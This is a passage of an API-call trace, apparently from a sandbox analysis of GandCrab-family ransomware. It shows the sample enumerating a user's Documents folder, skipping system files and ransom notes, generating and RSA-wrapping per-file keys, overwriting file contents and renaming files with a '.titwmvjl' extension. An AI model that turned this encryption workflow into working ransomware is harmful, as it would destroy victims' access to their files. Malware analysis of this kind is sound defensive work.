"c:\\users\\ciihmnxmn6ps\\documents\\aiz1pjrpdb7p-tmwyt.docx"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\aIz1pjrpDB7p-TmwYt.docx.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\aiz1pjrpdb7p-tmwyt.docx.titwmvjl"), dwFlags=0x1) returned 1 [0090.921] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.921] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0090.921] lstrcmpW (lpString1="AVyoVSF.ots", lpString2=".") returned 1 [0090.921] lstrcmpW (lpString1="AVyoVSF.ots", lpString2="..") returned 1 [0090.921] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="AVyoVSF.ots" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\AVyoVSF.ots") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\AVyoVSF.ots" [0090.921] lstrlenW (lpString=".titwmvjl") returned 9 [0090.921] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\AVyoVSF.ots") returned 43 [0090.921] VirtualAlloc (lpAddress=0x0, dwSize=0x96, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.921] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\AVyoVSF.ots.titwmvjl") returned 52 [0090.922] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\AVyoVSF.ots") returned 43 [0090.922] lstrlenW (lpString=".ots") returned 4 [0090.922] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.922] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ots ") returned 5 [0090.922] lstrcmpiW (lpString1=".ots", lpString2=".titwmvjl") returned -1 [0090.922] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.922] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\AVyoVSF.ots") returned 43 [0090.922] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\AVyoVSF.ots") returned 43 [0090.922] lstrcmpiW (lpString1="AVyoVSF.ots", lpString2="desktop.ini") returned -1 [0090.922] lstrcmpiW (lpString1="AVyoVSF.ots", lpString2="autorun.inf") returned 1 [0090.922] lstrcmpiW (lpString1="AVyoVSF.ots", lpString2="ntuser.dat") returned -1 [0090.922] lstrcmpiW (lpString1="AVyoVSF.ots", lpString2="iconcache.db") returned -1 [0090.922] lstrcmpiW (lpString1="AVyoVSF.ots", lpString2="bootsect.bak") returned -1 [0090.922] lstrcmpiW (lpString1="AVyoVSF.ots", lpString2="boot.ini") returned -1 [0090.922] lstrcmpiW (lpString1="AVyoVSF.ots", lpString2="ntuser.dat.log") returned -1 [0090.922] lstrcmpiW (lpString1="AVyoVSF.ots", lpString2="thumbs.db") returned -1 [0090.922] lstrcmpiW (lpString1="AVyoVSF.ots", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0090.922] lstrcmpiW (lpString1="AVyoVSF.ots", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0090.922] lstrcmpiW (lpString1="AVyoVSF.ots", lpString2="KRAB-DECRYPT.html") returned -1 [0090.922] lstrcmpiW (lpString1="AVyoVSF.ots", lpString2="CRAB-DECRYPT.html") returned -1 [0090.922] lstrcmpiW (lpString1="AVyoVSF.ots", lpString2="KRAB-DECRYPT.txt") returned -1 [0090.922] lstrcmpiW (lpString1="AVyoVSF.ots", lpString2="CRAB-DECRYPT.txt") returned -1 [0090.922] lstrcmpiW (lpString1="AVyoVSF.ots", lpString2="ntldr") returned -1 [0090.922] lstrcmpiW (lpString1="AVyoVSF.ots", lpString2="NTDETECT.COM") returned -1 [0090.922] lstrcmpiW (lpString1="AVyoVSF.ots", lpString2="Bootfont.bin") returned -1 [0090.922] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\AVyoVSF.ots") returned 43 [0090.922] lstrlenW (lpString=".ots") returned 4 [0090.922] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.923] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".ots ") returned 5 [0090.923] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.923] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.923] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\AVyoVSF.ots" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\avyovsf.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0090.923] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.923] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0090.924] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.924] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.924] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0090.925] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.925] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.925] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.925] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0090.925] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.925] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.925] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.925] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.925] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0090.926] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.926] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.926] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.926] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0090.926] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.926] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.926] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.927] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.927] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0090.927] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.927] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5034f8) returned 1 [0090.927] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.927] CryptGetKeyParam (in: hKey=0x5034f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0090.927] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.927] CryptEncrypt (in: hKey=0x5034f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0090.928] GetLastError () returned 0x0 [0090.928] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.928] CryptDestroyKey (hKey=0x5034f8) returned 1 [0090.928] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.928] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.928] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.928] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0090.928] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.929] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5037f8) returned 1 [0090.929] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.929] CryptGetKeyParam (in: hKey=0x5037f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0090.929] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.929] CryptEncrypt (in: hKey=0x5037f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0090.930] GetLastError () returned 0x0 [0090.930] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.930] CryptDestroyKey (hKey=0x5037f8) returned 1 [0090.930] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.930] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.930] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.930] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.930] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x15a34, lpOverlapped=0x0) returned 1 [0090.941] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffea5cc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.941] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x15a34, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x15a34, lpOverlapped=0x0) returned 1 [0090.943] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.943] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0090.944] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.947] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.948] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.948] CloseHandle (hObject=0x2ac) returned 1 [0090.949] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\AVyoVSF.ots" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\avyovsf.ots"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\AVyoVSF.ots.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\avyovsf.ots.titwmvjl"), dwFlags=0x1) returned 1 [0090.950] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.950] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0090.950] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0090.950] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0090.950] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\d2ca4a09d2ca4deb61a.lock" [0090.950] lstrlenW (lpString=".titwmvjl") returned 9 [0090.950] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\d2ca4a09d2ca4deb61a.lock") returned 56 [0090.950] VirtualAlloc (lpAddress=0x0, dwSize=0xb0, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.951] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 65 [0090.951] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\d2ca4a09d2ca4deb61a.lock") returned 56 [0090.951] lstrlenW (lpString=".lock") returned 5 [0090.951] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.951] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0090.951] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.951] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.951] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0090.951] lstrcmpW (lpString1="Database1.accdb", lpString2=".") returned 1 [0090.951] lstrcmpW (lpString1="Database1.accdb", lpString2="..") returned 1 [0090.951] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="Database1.accdb" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Database1.accdb") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Database1.accdb" [0090.951] lstrlenW (lpString=".titwmvjl") returned 9 [0090.951] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Database1.accdb") returned 47 [0090.951] VirtualAlloc (lpAddress=0x0, dwSize=0x9e, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0090.952] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Database1.accdb.titwmvjl") returned 56 [0090.952] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Database1.accdb") returned 47 [0090.952] lstrlenW (lpString=".accdb") returned 6 [0090.952] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.952] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".accdb ") returned 7 [0090.952] lstrcmpiW (lpString1=".accdb", lpString2=".titwmvjl") returned -1 [0090.952] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.952] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Database1.accdb") returned 47 [0090.952] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Database1.accdb") returned 47 [0090.952] lstrcmpiW (lpString1="Database1.accdb", lpString2="desktop.ini") returned -1 [0090.952] lstrcmpiW (lpString1="Database1.accdb", lpString2="autorun.inf") returned 1 [0090.952] lstrcmpiW (lpString1="Database1.accdb", lpString2="ntuser.dat") returned -1 [0090.952] lstrcmpiW (lpString1="Database1.accdb", lpString2="iconcache.db") returned -1 [0090.952] lstrcmpiW (lpString1="Database1.accdb", lpString2="bootsect.bak") returned 1 [0090.952] lstrcmpiW (lpString1="Database1.accdb", lpString2="boot.ini") returned 1 [0090.952] lstrcmpiW (lpString1="Database1.accdb", lpString2="ntuser.dat.log") returned -1 [0090.952] lstrcmpiW (lpString1="Database1.accdb", lpString2="thumbs.db") returned -1 [0090.952] lstrcmpiW (lpString1="Database1.accdb", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0090.952] lstrcmpiW (lpString1="Database1.accdb", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0090.952] lstrcmpiW (lpString1="Database1.accdb", lpString2="KRAB-DECRYPT.html") returned -1 [0090.952] lstrcmpiW (lpString1="Database1.accdb", lpString2="CRAB-DECRYPT.html") returned 1 [0090.952] lstrcmpiW (lpString1="Database1.accdb", lpString2="KRAB-DECRYPT.txt") returned -1 [0090.952] lstrcmpiW (lpString1="Database1.accdb", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.952] lstrcmpiW (lpString1="Database1.accdb", lpString2="ntldr") returned -1 [0090.952] lstrcmpiW (lpString1="Database1.accdb", lpString2="NTDETECT.COM") returned -1 [0090.952] lstrcmpiW (lpString1="Database1.accdb", lpString2="Bootfont.bin") returned 1 [0090.953] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Database1.accdb") returned 47 [0090.953] lstrlenW (lpString=".accdb") returned 6 [0090.953] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.953] wsprintfW (in: param_1=0x2410000, param_2="%s " | out: param_1=".accdb ") returned 7 [0090.953] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.953] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0090.953] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Database1.accdb" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\database1.accdb"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2ac [0090.954] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.954] ReadFile (in: hFile=0x2ac, lpBuffer=0x2410000, nNumberOfBytesToRead=0x21c, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesRead=0x259f470*=0x21c, lpOverlapped=0x0) returned 1 [0090.963] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.963] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.963] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0090.964] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.964] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.964] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.964] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x20, pbBuffer=0x259f42c | out: pbBuffer=0x259f42c) returned 1 [0090.964] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.965] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.965] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.965] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.965] CryptAcquireContextW (in: phProv=0x259f3a0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f3a0*=0x4c9980) returned 1 [0090.966] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2420000 [0090.966] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0090.966] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0090.966] CryptGenRandom (in: hProv=0x4c9980, dwLen=0x8, pbBuffer=0x259f44c | out: pbBuffer=0x259f44c) returned 1 [0090.966] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.966] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.966] VirtualFree (lpAddress=0x2420000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.966] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.967] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0090.967] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.967] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x5034f8) returned 1 [0090.967] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.967] CryptGetKeyParam (in: hKey=0x5034f8, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0090.967] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.967] CryptEncrypt (in: hKey=0x5034f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410000*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410000*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0090.968] GetLastError () returned 0x0 [0090.968] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.968] CryptDestroyKey (hKey=0x5034f8) returned 1 [0090.968] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.968] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.968] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.968] CryptAcquireContextW (in: phProv=0x259f394, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259f394*=0x4c9980) returned 1 [0090.968] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.969] CryptImportKey (in: hProv=0x4c9980, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259f398 | out: phKey=0x259f398*=0x503778) returned 1 [0090.969] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.969] CryptGetKeyParam (in: hKey=0x503778, dwParam=0x8, pbData=0x259f38c, pdwDataLen=0x259f390, dwFlags=0x0 | out: pbData=0x259f38c*=0x800, pdwDataLen=0x259f390*=0x4) returned 1 [0090.969] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.969] CryptEncrypt (in: hKey=0x503778, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2410100*, pdwDataLen=0x259f3c4*=0xc8, dwBufLen=0x100 | out: pbData=0x2410100*, pdwDataLen=0x259f3c4*=0x100) returned 1 [0090.969] GetLastError () returned 0x0 [0090.969] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.969] CryptDestroyKey (hKey=0x503778) returned 1 [0090.969] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0090.969] CryptReleaseContext (hProv=0x4c9980, dwFlags=0x0) returned 1 [0090.970] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0090.970] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0090.970] ReadFile (in: hFile=0x2ac, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259f470, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259f470*=0x57000, lpOverlapped=0x0) returned 1 [0090.993] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0xfffa9000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.993] WriteFile (in: hFile=0x2ac, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x57000, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259f454*=0x57000, lpOverlapped=0x0) returned 1 [0090.996] SetFilePointerEx (in: hFile=0x2ac, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0090.996] WriteFile (in: hFile=0x2ac, lpBuffer=0x2410000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259f454, lpOverlapped=0x0 | out: lpBuffer=0x2410000*, lpNumberOfBytesWritten=0x259f454*=0x21c, lpOverlapped=0x0) returned 1 [0091.001] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.005] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.007] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.007] CloseHandle (hObject=0x2ac) returned 1 [0091.008] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Database1.accdb" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\database1.accdb"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\Database1.accdb.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\database1.accdb.titwmvjl"), dwFlags=0x1) returned 1 [0091.009] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.009] FindNextFileW (in: hFindFile=0x503578, lpFindFileData=0x259f524 | out: lpFindFileData=0x259f524) returned 1 [0091.009] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0091.009] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0091.009] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\", lpString2="desktop.ini" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\desktop.ini") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\desktop.ini" [0091.009] lstrlenW (lpString=".titwmvjl") returned 9 [0091.009] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\desktop.ini") returned 43 [0091.009] VirtualAlloc (lpAddress=0x0, dwSize=0x96, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0091.009] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\desktop.ini.titwmvjl") returned 52 [0091.010] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\desktop.ini") returned 43 [0091.010] lstrlenW (lpString=".ini") returned 4 [0091.010] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0091.010] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".ini ") returned 5 [0091.010] lstrcmpiW (lpString1=".ini", lpString2=".titwmvjl") returned -1 [0091.010] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0091.010] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\desktop.ini") returned 43 [0091.010] lstrlenW 